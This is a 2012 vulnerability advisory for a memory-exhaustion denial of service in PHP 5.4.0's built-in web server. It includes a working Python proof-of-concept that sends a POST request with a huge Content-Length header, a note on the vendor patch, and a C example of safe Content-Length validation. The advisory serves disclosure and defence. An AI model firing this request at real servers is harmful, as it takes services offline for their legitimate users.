Release date: 2012-03-24
Updated on: 2012-03-27
Affected Systems:
PHP 5.5.0-DEV
PHP 5.4.1RC1-DEV
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52704
PHP is a scripting language used mainly to generate dynamic web pages; it can also be used for command-line and graphical user interface programs.
The built-in web server in PHP has a remote denial of service vulnerability. By sending an HTTP request with a large Content-Length header value to the built-in server, an attacker can exhaust available memory and deny service to legitimate users.
<* Source: vendor
Link: https://bugs.php.net/bug.php?id=61461
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
#!/usr/bin/python
# Title: PHP 5.4.0 Built-in Web Server DoS PoC
# Date: 16 March 2012
# Author: ls (contact@kaankivilcim.com)
# Reference: https://bugs.php.net/bug.php?id=61461
# Comments: Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV
# The value of the Content-Length header is passed directly to a pemalloc() call in sapi/cli/php_cli_server.c
# on line 1538. The inline function defined within Zend/zend_alloc.h for malloc() will fail, and will terminate
# the process with the error message "Out of memory".
#
# 1537 if (!client->request.content) {
# 1538     client->request.content = pemalloc(parser->content_length, 1);
# 1539     client->request.content_len = 0;
# 1540 }
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1:80
# Document root is /tmp
# Press Ctrl-C to quit.
# Out of memory
import socket, sys
target = "127.0.0.1"
port = 80;
request = "POST / HTTP/1.1\n"
request += "Content-Type: application/x-www-form-urlencoded\n"
request += "Content-Length: 2147483638\n" # <-- Choose size larger than the available memory on target
request += "A=B\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
except:
    print "[-] Connection to %s:%s failed!" % (target, port)
    sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.php.net
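
The allocation quoted in the PoC comments sizes a buffer directly from the client-declared Content-Length. The following is an added example, not PHP's actual patch and not code from the original advisory: it validates the header against a cap before anything is allocated and grows the buffer only as body bytes really arrive. The names body_buf, body_begin, body_append and the MAX_BODY_BYTES limit are hypothetical.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define MAX_BODY_BYTES (8u * 1024u * 1024u) /* assumed policy cap, not a PHP setting */

struct body_buf {        /* hypothetical stand-in for client->request.content */
    char  *data;
    size_t len;          /* bytes received so far */
    size_t declared;     /* validated Content-Length */
};

/* Parse and validate the header value without allocating anything.
 * Returns 0 on success, 400 for a malformed value, 413 if over the cap. */
int body_begin(struct body_buf *b, const char *content_length)
{
    char *end;
    unsigned long long n;

    memset(b, 0, sizeof *b);
    if (content_length[0] < '0' || content_length[0] > '9')
        return 400;                  /* rejects "", "-1", "+5", " 5" */
    errno = 0;
    n = strtoull(content_length, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return 400;                  /* overflow or trailing junk */
    if (n > MAX_BODY_BYTES)
        return 413;                  /* declared size exceeds policy */
    b->declared = (size_t)n;
    return 0;
}

/* Append bytes that actually arrived, so memory use follows received data
 * rather than the declared length. Returns 0, 400 (overrun) or 500 (OOM). */
int body_append(struct body_buf *b, const char *chunk, size_t n)
{
    char *p;

    if (n > b->declared - b->len)
        return 400;                  /* more data than was declared */
    if (n == 0)
        return 0;
    p = realloc(b->data, b->len + n);
    if (p == NULL)
        return 500;                  /* fail this request, not the process */
    memcpy(p + b->len, chunk, n);
    b->data = p;
    b->len += n;
    return 0;
}
```

With this pattern the Content-Length value used in the PoC is answered with a 413 before any memory is reserved, and an allocation failure ends one request instead of the server process.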